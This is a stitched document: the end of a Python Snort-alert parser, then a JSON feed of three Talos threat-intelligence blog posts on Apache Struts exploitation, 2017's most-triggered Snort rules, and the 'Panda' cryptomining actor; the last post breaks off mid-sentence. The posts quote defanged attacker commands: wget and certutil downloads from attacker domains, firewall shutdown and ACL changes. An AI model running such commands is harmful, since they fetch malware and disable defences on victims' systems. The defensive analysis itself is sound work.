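    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["rule"] = f"{rec['gid']}:{rec['sid']}:{rec['rev']}"  # the GID:SID:rev triple
    rec["direction"] = direction(rec["src"], rec["dst"])
    return rec


def summarize(lines):
    """Parse all lines; return (records, counts by rule, by direction, by class type)."""
    records = [r for r in (parse_alert(l) for l in lines) if r]
    by_rule = Counter(r["rule"] for r in records)
    by_dir = Counter(r["direction"] for r in records)
    by_cls = Counter(r["cls"] or "unclassified" for r in records)
    return records, by_rule, by_dir, by_cls


def noisiest_sources(records, rule: str, top: int = 3):
    """Hosts that fire one rule most often. A beacon rule such as the ZeroAccess
    super-node check-in fires repeatedly per infected host, so the top entry here
    is the machine to pull off the network first."""
    return Counter(r["src"] for r in records if r["rule"] == rule).most_common(top)


if __name__ == "__main__":
    recs, by_rule, by_dir, by_cls = summarize(SAMPLE_ALERTS.splitlines())
    print("top rules:", by_rule.most_common(5))
    print("direction:", dict(by_dir))
    print("class types:", dict(by_cls))
    print("ZeroAccess sources:", noisiest_sources(recs, "1:23493:6"))
```

Direction is only as good as the sensor's notion of "internal": the 9:6:5 ratio the post reports means something only if INTERNAL_NETS matches what the Meraki appliance considers its LAN, and the "external" bucket exists precisely to surface alerts where that assumption is wrong. Counting by the full GID:SID:rev triple keeps old and new revisions of a rule apart, which is what you want when checking that a sensor is actually running the latest revision.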
{"talosblog": [{"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. 
Below is a sample of the command embedded in the HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This initiates a wget request that discards the HTTP response to /dev/null, which indicates purely scanning activity: the request tells the remote server which websites are potentially vulnerable, and the inclusion of the compromised website in the URL supports that reading. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path /struts2-rest-showcase/orders/3. Additionally, most of the exploitation attempts send the data to wildkind[.]ru, with a large share of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been 
identified where Talos believes another threat actor is exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache Struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to serving normal pages and JSON may help reduce the risk of compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. 
In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as they account for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing activity exploiting the vulnerability. To their credit, the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake, bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these types of vulnerabilities; it's now down to days or hours, and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-29T19:59:49", "description": "_This post was written by [Martin Lee](<https://www.blogger.com/profile/17941683095374027310>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._\n\n \n\n\n2017 was an eventful year for cyber security with high profile vulnerabilities that allowed self-replicating worm attacks such as [WannaCry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [BadRabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) to impact organizations throughout the world. In 2017, Talos researchers discovered many new attacks including backdoors in legitimate software such as [CCleaner](<https://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html>), designed to target high tech companies as well as [M.E.Doc](<http://blog.talosintelligence.com/2017/07/the-medoc-connection.html>), responsible for initial spread of [Nyetya](<http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>). Despite all those, headline making attacks are only a small part of the day to day protection provided by security systems.\n\n \n\n\nIn this post we review some of the findings created by investigating the most frequently triggered Snort signatures as reported by [Cisco Meraki](<https://meraki.cisco.com>) systems and included in the Snort default policy set.\n\n \n\n\n## Top 5 Signatures\n\n \n\n\nSnort signatures are classified into different classes based on the type of activity detected with the most commonly reported class type being \u201cTrojan-activity\u201d followed by \u201cPolicy-violation\u201d and \u201cMisc-activity\u201d. Some less frequently reported class types such as \u201cAttempted-admin\u201d and \u201cWeb-application-attack\u201d are particularly interesting in the context of detecting malicious inbound and outbound network traffic.\n\n \n\n\nSnort signatures are identified from three parts. 
The Generator ID (GID), the Signature ID (SID) and revision number. The GID identifies what part of Snort generates the event; \u20181\u2019 indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search box on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule; be sure to use the latest revision of any rule.\n\n \n\n\nWithout further ado, here are the top 5 triggered signatures within policy in reverse order, just as you would expect from a yearly Top of the Snort alerts chart. \n\n### #5 - 1:39867:3 \u201cSuspicious .tk dns query\u201d\n\n \n\n\nThe .tk top level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which makes .tk one of the most prolific top level domains in terms of number of domain names registered. However, this free registration also leads to .tk domains frequently being abused by attackers.\n\n \n\n\nThis signature triggers on DNS lookups for .tk domains. A trigger doesn\u2019t necessarily mean that the lookup is malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.\n\n \n\n\nOther, similar signatures detecting DNS lookups to other rarely used top level domains such as .bit, .pw and .top also made it into our list of top 20 most triggered rules.\n\n### #4 - 1:23493:6 \u201cWin.Trojan.ZeroAccess outbound connection\u201d\n\n \n\n\nZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serving as a platform for conducting click fraud campaigns. 
This rule detects UDP packets sent by an infected system to so called super nodes, which participate in the network of command and control servers. The rule can be used to block outbound communication from the malware.\n\n \n\n\nZeroAccess is a state of the art rootkit and is able to hide from the basic detection techniques on the infected machine. However, network detection using IPS such as Snort can quickly pinpoint a source of the malicious ZeroAccess traffic as it generates a fairly noisy and regular communication pattern.\n\n \n\n\nThe malware sends a UDP packet to check with a super node once every second, so a single affected organization is expected to have many alerts. This may be one of the reasons why the ZeroAccess detection signature is placed high on our list.\n\n### #3 - 1:41083:1 \u201csuspicious .bit dns query\u201d\n\n \n\n\nThe .bit top level domain extension is relatively obscure, but is occasionally used for hosting malware C2 systems with Necurs being one of the families using it as a part of the botnet communication. The .bit TLD is managed using Namecoin, a distributed ledger with no central authority that is one of the first forks of the Bitcoin cryptocurrency. The decentralised nature of .bit domains means that few DNS servers resolve the domains, but equally the domains are resistant to take down.\n\n \n\n\nThe signature triggers on DNS lookups for .bit domains. As with .tk lookups, if the signature triggers, this doesn\u2019t necessarily mean that such a lookup is malicious in nature. However, a sharp increase in the rule triggering may warrant investigation.\n\n### #2 - 1:42079:1 \u201cWin.Trojan.Jenxcus outbound connection attempt with unique User-Agent\u201d\n\n \n\n\nJenxcus is more of a worm than a trojan, despite the naming used in the human readable description of the signature. It spreads by copying itself to removable and shared drives and allows the attacker to remotely access and control the infected system. 
Like many trojans, once a system is infected, Jenxcus seeks to establish contact with its C2 infrastructure. This contact is made with an HTTP POST request using a specific user-agent string. The user-agent string itself is specific to this trojan and its many variants, and can be detected and blocked using this signature.\n\n### #1 - 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d\n\n \n\n\nInternet of Things (IoT) security is something which we have written about [extensively](<http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html>). The Mirai botnet, and its variants, continue to try to infect IoT devices by attempting to log in with default usernames and passwords. Once the malware successfully accesses a device, it will check that the device behaves as expected and not like a honeypot. It is this check which is detected by this rule. This post compromise activity has been constantly present throughout the year and at the peak of its activity in February accounted for over 20% of all alerts reported daily.\n\n[](<https://4.bp.blogspot.com/-If7RuT_F_2M/Wm9fBRZAa8I/AAAAAAAAADo/C_BUhkG31aovUEOcnZ-c7-z520ZS9dVgQCLcBGAs/s1600/mirai.jpg>)\n\n \n\n\n## Inbound, Outbound or Internal\n\n \n\n\nTraffic seen by an IDS can flow from external to internal (inbound), from internal to external (outbound), or between internal hosts without crossing the network boundary (internal). An alert may be triggered and logged for any of these scenarios.\n\n \n\n\nOutbound signatures were triggered during 2017 much more frequently than internal, which in turn were more frequent than inbound, with ratios of approximately 9:6:5. The profile of the alerts is different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. 
Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. Internal alerts are most likely to be due to trojan or miscellaneous activity.\n\n \n\n\nLooking at these data sets in more detail gives us the following:\n\n[](<https://4.bp.blogspot.com/-Vx8dv-DQBMw/Wm9hby18fUI/AAAAAAAAAD0/1S9x5QFNs-cNMqigLaj8NgQddaLl-vm8gCLcBGAs/s1600/inbound.jpg>)\n\n \n\n\n\u201cTrojan-activity\u201d class type alerts were dominated by the Mirai post compromise fingerprinting attempts, but this category also contains blocked attempts to download executable files disguised as plain text, and traffic associated with the Zeus, Swabfex, Soaphrish and Glupteba malware families.\n\n \n\n\nThe \u201cAttempted-user\u201d class type covers attempts to exploit user level vulnerabilities. The majority of the most frequently triggered signatures in this set were detected attempts to exploit Internet Explorer vulnerabilities.\n\n \n \n\n\nFor outbound traffic, the most frequently reported class types belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[](<https://1.bp.blogspot.com/-3ReC-VJ4c4U/Wm9efWbE1RI/AAAAAAAAADg/uLB_1xM1ts8q8BGfEQSnukBhvGwpxTDkgCLcBGAs/s1600/outbound.jpg>)\n\n \n\n\nThe most frequently triggered signatures within the \u201cTrojan-activity\u201d signature class are the Jenxcus and .bit dns activity signatures discussed above. Other prevalent trojan activity is related to the ZeroAccess, Cidox, Zeus and Ramnit trojans.\n\n \n \n\n\nFor internal traffic, the most frequently reported class types again belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[](<https://3.bp.blogspot.com/-WPqQaY8jpX4/Wm9csL0dQbI/AAAAAAAAADI/EGmC0y1-koUKV7SjLPqSqSENCB1SCIfxACLcBGAs/s1600/internal.jpg>)\n\n \n\n\nMisc activity signatures include detections for various traffic patterns which do not easily fit into any other specific class types. 
This includes detection of DNS requests to less common top level domains like .top, .win, .trade, detection of traffic to domains known to be used by adware and other potentially unwanted applications (PUAs) as well as detection of suspicious HTTP user-agent strings.\n\n \n\n\n## Peaks and Troughs\n\n \n\n\nAttacks are happening continuously. Every hour of the day, every day of the year signatures are being triggered by the constant background noise of the attackers\u2019 activity. However, some signatures are clearly triggered by malicious activity being conducted during a particular period.\n\n \n\n\nOn March 6th, Apache disclosed an Apache Struts command injection vulnerability [CVE-2017-5638](<https://www.cvedetails.com/cve/cve-2017-5638>). Talos released signature [1:41818](<https://www.snort.org/rule_docs/1-41818>) to detect and block exploitation of the vulnerability. Within a couple of days, attackers were conducting [widespread campaigns](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) to identify and compromise vulnerable systems.\n\n \n\n\nAs shown in the graph below, attempts to exploit CVE-2017-5638 comprised more than 20% of all triggering signatures at the peak of the malicious activity. This campaign soon abated, but never ceased completely, until a second large peak in activity occurred over 6 days at the end of October.\n\n[](<https://4.bp.blogspot.com/-0qQJHwb3FeY/Wm9ijI4-c0I/AAAAAAAAAEI/F46PdClpxsE7hgYoXRYVqr9HyqK37-ivQCLcBGAs/s1600/struts.jpg>)\n\n \n\n\nThis graph neatly illustrates the importance of patching as well as installing and enabling signatures for new vulnerabilities as soon as possible. 
There may be a very short period of time between the disclosure of a vulnerability and the widespread attempted exploitation of the vulnerability by threat actors.\n\n \n\n\nSimilarly, once an initial attempt to compromise is over, the same attack may recommence some time later, so defences need to be maintained in order to ensure that systems are kept protected.\n\n \n\n\nAnother interesting pattern showing several periods of increased activity can be seen in the timeline for signature [1:40843](<https://www.snort.org/rule_docs/1-40843>). This signature detects and blocks attempts to exploit the so-called SSL Death Alert denial of service vulnerability in OpenSSL ([CVE-2016-8610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=49575>)). An attacker can exploit vulnerable systems over the network to consume 100% CPU, preventing the system from responding to legitimate requests.\n\nFor extended periods during 2017, this vulnerability was not heavily targeted by attackers. However, there are very clear periods when attackers were conducting campaigns to exploit this vulnerability.\n\n[](<https://3.bp.blogspot.com/-eUHPebdBogQ/Wm9dFKuIuhI/AAAAAAAAADU/J27BULbKtxA3iDQoVSkvsUyyrIqtOONZgCLcBGAs/s1600/dos.jpg>)\n\n \n\n\nOur primary advice is to install patches as soon as possible. However, patched versions of some software packages are not being released for this vulnerability. In this case, upgrading to a non-vulnerable version would be the preferred option, but this may not be possible in every case. Ensuring that vulnerable systems are protected by an IPS with the relevant signatures installed and enabled helps keep malicious traffic from impacting unpatched vulnerable systems.\n\n \n\n\n## Discussion\n\n \n\n\nSnort signatures detect potentially malicious network activity. Understanding why particular signatures are triggered and how they can protect systems is a key part of network security. 
Snort signatures can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack or has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization\u2019s security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of the security alerts being generated.\n\n \n\n\nAs the threat environment changes, it is necessary to ensure that the correct signatures are in place protecting systems. Usually, this means ensuring that the most recent signature set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.\n\n \n\n\nOur most commonly triggered signature in 2017, 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d, highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices, no matter how small, are protected.\n\n \n\n\nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For a full understanding of the meaning of triggered detections, it is important for the signatures to be open source. 
Knowing what network content caused a signature to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.\n\n \n\n\nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving [community of researchers](<https://www.snort.org/community>) contributing to Snort and helping to keep networks secure against attack. We\u2019re also proud to contribute to the training and education of network engineers through the [Cisco Networking Academy](<https://www.netacad.com>), as well as through the release of additional [open-source tools](<https://www.talosintelligence.com/software>) and the detailing of attacks on our blog.\n\n \n\n\nThere is no doubt that 2018 will bring its own security challenges, and it will be interesting to follow how reported detections evolve over the year together with new threats. We will make sure to keep you up to date with events relevant to your organizations and networks.\n\n", "cvss3": {}, "published": "2018-01-29T11:37:00", "type": "talosblog", "title": "2017 in Snort Signatures.", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-8610", "CVE-2017-5638"], "modified": "2018-01-29T19:37:15", "id": "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/ZAu5fhdHIK0/2017-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining 
malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse networks, and their use of RATs mean that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again that they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits previously published by the Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns. 
\n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that we linked to a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as from kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. 
In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in and, similarly, save it under another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files by running cacls.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. 
\n \nThe malware also issues a GET request to the Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp, which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits for vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engage in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. 
Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saves it under a high-entropy filename, e.g. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is that previously observed samples acquired the victim's internal IP and reached out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. 
This sample instead installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\", passes it to Masscan to scan for port 445, and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords. \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is 